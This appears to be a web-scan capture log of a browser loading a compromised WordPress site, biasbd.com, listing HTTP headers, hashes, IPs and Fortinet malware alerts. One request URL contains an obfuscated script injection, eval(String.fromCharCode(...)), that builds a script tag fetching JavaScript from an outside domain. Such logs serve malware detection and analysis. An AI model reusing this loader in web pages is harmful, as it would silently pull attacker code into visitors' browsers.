firefox.settings.services.mozilla.com/v1/
143.204.55.27200 OK 939 B URL HTTP/1.1 firefox.settings.services.mozilla.com/v1/
IP 143.204.55.27:0
File type JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Hash 2d12f67fe57a87e7366b662d153a5582
d7b02d81cc74f24a251d9363e0f4b0a149264ec1
73c273c0b5a2de3cb970b8e8c187999d3b55e760dc7766dab4bb76428d19b551
GET /v1/ HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 939
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length, Backoff, Content-Type, Retry-After, Alert
Cache-Control: max-age=3600
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Date: Tue, 04 Oct 2022 07:29:42 GMT
X-Content-Type-Options: nosniff
X-Cache: Hit from cloudfront
Via: 1.1 1ca0323262515c9240c58fe69a9ac826.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: hyliLXTcNbYI7_nXEiXrTs2GbwUc5dp2P49V4fAJ-7KgBbEtxPRZ2Q==
Age: 3253
r3.o.lencr.org/
23.36.77.32200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash eabb7d9ffae717f7305d63c057755470
3b7f0baccfdbb8d9ffefa4a2215d4d6094be454a
ab48f17e54075e1ecf034278e82bcacd2e3689773186cc84fba9b79aac907294
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "AB48F17E54075E1ECF034278E82BCACD2E3689773186CC84FBA9B79AAC907294"
Last-Modified: Tue, 04 Oct 2022 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=6969
Expires: Tue, 04 Oct 2022 10:20:04 GMT
Date: Tue, 04 Oct 2022 08:23:55 GMT
Connection: keep-alive
content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2022-10-30-18-47-44.chain
143.204.55.49200 OK 5.3 kB URL HTTP/2 content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2022-10-30-18-47-44.chain
IP 143.204.55.49:0
File type PEM certificate\012- , ASCII text
Hash 6113f8408c59aebe188d6af273b90743
7398873bf00f99944eaa77ad3ebc0d43c23dba6b
b6e0cc9ad68306208a160f3835fb8da76acc5a82d8fde1da5a98e1de1c11a770
GET /chains/remote-settings.content-signature.mozilla.org-2022-10-30-18-47-44.chain HTTP/1.1
Host: content-signature-2.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: binary/octet-stream
content-length: 5348
last-modified: Sat, 10 Sep 2022 18:47:45 GMT
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
date: Tue, 04 Oct 2022 05:28:28 GMT
etag: "6113f8408c59aebe188d6af273b90743"
x-cache: Hit from cloudfront
via: 1.1 71c98156ae29b36a903974f9dd2568f8.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: F1J2EwrIUxViCtKksGnPLaJ8KXYDHrdLHpitiXLlVMVzJ13a8jYX0w==
age: 10528
X-Firefox-Spdy: h2
contile.services.mozilla.com/v1/tiles
34.117.237.239200 OK 12 B URL HTTP/2 contile.services.mozilla.com/v1/tiles
IP 34.117.237.239:0
File type JSON data\012- , ASCII text, with no line terminators
Hash 23e88fb7b99543fb33315b29b1fad9d6
a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
GET /v1/tiles HTTP/1.1
Host: contile.services.mozilla.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
date: Tue, 04 Oct 2022 08:23:55 GMT
content-type: application/json
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2
firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US
143.204.55.27200 OK 329 B URL HTTP/1.1 firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US
IP 143.204.55.27:0
File type JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Hash 0333b0655111aa68de771adfcc4db243
63f295a144ac87a7c8e23417626724eeca68a7eb
60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 329
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: ETag, Expires, Content-Length, Cache-Control, Pragma, Content-Type, Alert, Backoff, Last-Modified, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Date: Tue, 04 Oct 2022 07:29:33 GMT
Cache-Control: max-age=3600, max-age=3600
Expires: Tue, 04 Oct 2022 08:26:00 GMT
ETag: "1648230346554"
X-Cache: Hit from cloudfront
Via: 1.1 095562e8748e634f880ee3c4ada2b6d0.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: YQLjaZxtxBRntSo8duieVh4NyABuTEHtyAasI7B7AGVxl3WLcJxmtQ==
Age: 3262
biasbd.com/ssr-on-demands
111.221.45.32200 OK 20 kB URL HTTP/1.1 biasbd.com/ssr-on-demands
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (16918), with CRLF, LF line terminators
Hash 00620bb1fd8b9f3ac7eb87952ceb729f
29a76050197a765b51a2017a20004115065048cf
ca39739be3de62a4f662a3ac4c3e74a11bce0777a016c25cd92a3c18a727d474
Analyzer Verdict Alert fortinet Malware
GET /ssr-on-demands HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
last-modified: Tue, 04 Oct 2022 08:23:55 GMT
etag: "44fd4f9c7013569ed0cc90afc9f3dee5"
content-type: text/html; charset=UTF-8
content-length: 19529
content-encoding: gzip
vary: Accept-Encoding
date: Tue, 04 Oct 2022 08:23:55 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
ocsp.digicert.com/
93.184.220.29200 OK 471 B IP 93.184.220.29:0
Hash 321fa9a78e31dcb66601ac5890bfba73
c325580db79bde6fd00d2d0c7e3f675e4c0046bb
83029b324b4c36522ae47eef9614c124b0ad2994de412d7ea82f990ad8ae9d92
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 3677
Cache-Control: 'max-age=158059'
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 08:23:56 GMT
Last-Modified: Tue, 04 Oct 2022 07:22:39 GMT
Server: ECS (ska/F712)
X-Cache: HIT
Content-Length: 471
static.zotabox.com/%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js
172.67.20.217404 Not Found 764 B URL HTTP/1.1 static.zotabox.com/%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js
IP 172.67.20.217:0
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (2986)
Hash e0b278a03f3c0916a366ea6e39a232c7
c383e5fa69a1cf6016560cb0aa9f17be5b699bea
22d617e43c0296250a3e4b524c3672329157563a5b5f065f4f7d0e8b5ea78e40
GET /%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js HTTP/1.1
Host: static.zotabox.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://biasbd.com/
HTTP/1.1 404 Not Found
Date: Tue, 04 Oct 2022 08:23:56 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: Zotabox
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST
Content-Security-Policy: default-src 'none'
X-Content-Type-Options: nosniff
Content-Encoding: gzip
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 754c84aedda50b65-OSL
biasbd.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2.16
111.221.45.32200 OK 4.8 kB URL HTTP/1.1 biasbd.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (29271), with no line terminators
Hash 35b331de30552ae69d5fb5e0770613d8
b2208e9cbf8741e7dea99ac2135c16b6fab04ed1
34eba544a0c7e66ad8abad918878b0e561f43708dfe240513aa4331c81e0c9e4
GET /wp-includes/css/dist/block-library/style.min.css?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Thu, 15 Apr 2021 13:19:39 GMT
etag: "7257-60783d6b-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 4780
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/woocommerce/assets/css/blocks/style.css?ver=3.6.7
111.221.45.32200 OK 924 B URL HTTP/1.1 biasbd.com/wp-content/plugins/woocommerce/assets/css/blocks/style.css?ver=3.6.7
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (4166)
Hash 35d69fda83362d1bb1fd562889dbafec
e6e85c0c5618044b338a7f0cc1770e79142619b4
9478b7e8de8615eb26bff7009d774649817b69736b047b7e654e645a0927d18d
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/woocommerce/assets/css/blocks/style.css?ver=3.6.7 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Thu, 10 Mar 2022 19:31:35 GMT
etag: "18da-622a5217-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 924
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/js/owlcarousel/assets/owl.carousel.css?ver=5.2.16
111.221.45.32200 OK 1.1 kB URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/js/owlcarousel/assets/owl.carousel.css?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with CRLF line terminators
Hash d5b8a7aca62b185ed81766afe2345389
f736472969a5e2a9396e5f84be9b50e014c6e213
ea1cef87c03af1dc5a2e1e91b9d155ba113a36e1f5ee756c259b0ff978385855
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/industrial/js/owlcarousel/assets/owl.carousel.css?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "12de-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 1106
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 471 B IP 142.250.74.3:0
Hash 9e40b2c69615f45f2bc898334ab3e343
6a569648ed10564e126d3bbf3f91352e6b3f6d4f
4f1d0982c58b9bbeaa266b99292baa1a00c9e39280f73d5a525722c851e15981
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 08:23:56 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
push.services.mozilla.com/
35.164.183.116101 Switching Protocols 0 B URL HTTP/1.1 push.services.mozilla.com/
IP 35.164.183.116:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET / HTTP/1.1
Host: push.services.mozilla.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: Phr/whBU8cMOvwFBFGoOow==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: zZx9fzylN6id7MCYmtXb9bi88ss=
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 471 B IP 142.250.74.3:0
Hash 9e40b2c69615f45f2bc898334ab3e343
6a569648ed10564e126d3bbf3f91352e6b3f6d4f
4f1d0982c58b9bbeaa266b99292baa1a00c9e39280f73d5a525722c851e15981
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 08:23:56 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 471 B IP 142.250.74.3:0
Hash 9e40b2c69615f45f2bc898334ab3e343
6a569648ed10564e126d3bbf3f91352e6b3f6d4f
4f1d0982c58b9bbeaa266b99292baa1a00c9e39280f73d5a525722c851e15981
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 08:23:56 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
